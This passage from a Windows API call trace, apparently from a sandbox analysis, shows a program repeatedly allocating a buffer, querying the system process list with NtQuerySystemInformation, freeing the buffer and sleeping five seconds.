RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0222.429] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0222.432] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0222.433] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0222.435] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0222.435] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0222.435] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0222.436] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0222.436] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0222.439] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0222.440] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0222.441] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0222.441] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0222.442] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0222.442] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0222.442] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0222.445] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0222.446] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0222.447] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0222.447] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0222.448] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0222.448] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0222.449] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0222.453] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0222.453] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0222.455] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0222.455] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0222.456] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0222.456] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0222.457] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0222.461] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0222.462] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0222.463] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0222.463] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0222.464] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0222.464] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0222.465] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0222.488] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0222.489] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0222.491] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0222.491] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0222.492] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0222.492] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0222.493] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0222.498] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0222.499] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0222.500] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0222.501] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0222.502] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0222.502] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0222.503] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0222.508] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0222.509] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0222.510] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0222.511] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0222.511] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0222.512] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0222.512] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0222.517] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0222.518] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0222.520] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0222.520] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0222.521] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0222.522] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0222.522] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0222.525] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0222.526] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0222.528] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0222.528] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0222.529] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0222.529] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0222.529] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0222.532] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0222.533] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0222.535] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0222.535] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0222.536] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0222.536] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0222.536] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0222.541] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0222.543] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0222.545] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0222.545] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0222.546] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0222.546] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0222.547] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0222.551] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0222.552] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0222.556] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0222.556] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0222.557] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0222.557] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0222.557] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0222.561] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0222.561] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0222.563] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0222.563] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0222.564] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0222.564] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0222.564] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0222.568] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0222.569] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0222.571] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0222.571] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0222.572] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0222.573] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0222.573] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0222.577] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0222.578] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0222.580] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0222.580] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0222.581] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0222.581] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0222.581] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0222.585] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0222.586] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0222.588] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0222.588] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0222.589] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0222.589] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0222.590] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0222.594] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0222.594] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0222.596] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0222.597] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0222.598] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0222.598] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0222.598] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0222.603] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0222.604] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0222.605] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0222.606] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0222.607] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0222.607] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0222.607] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0222.613] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0222.614] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0222.616] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0222.616] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0222.617] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0222.618] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0222.618] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0222.623] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0222.624] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0222.625] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0222.625] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, 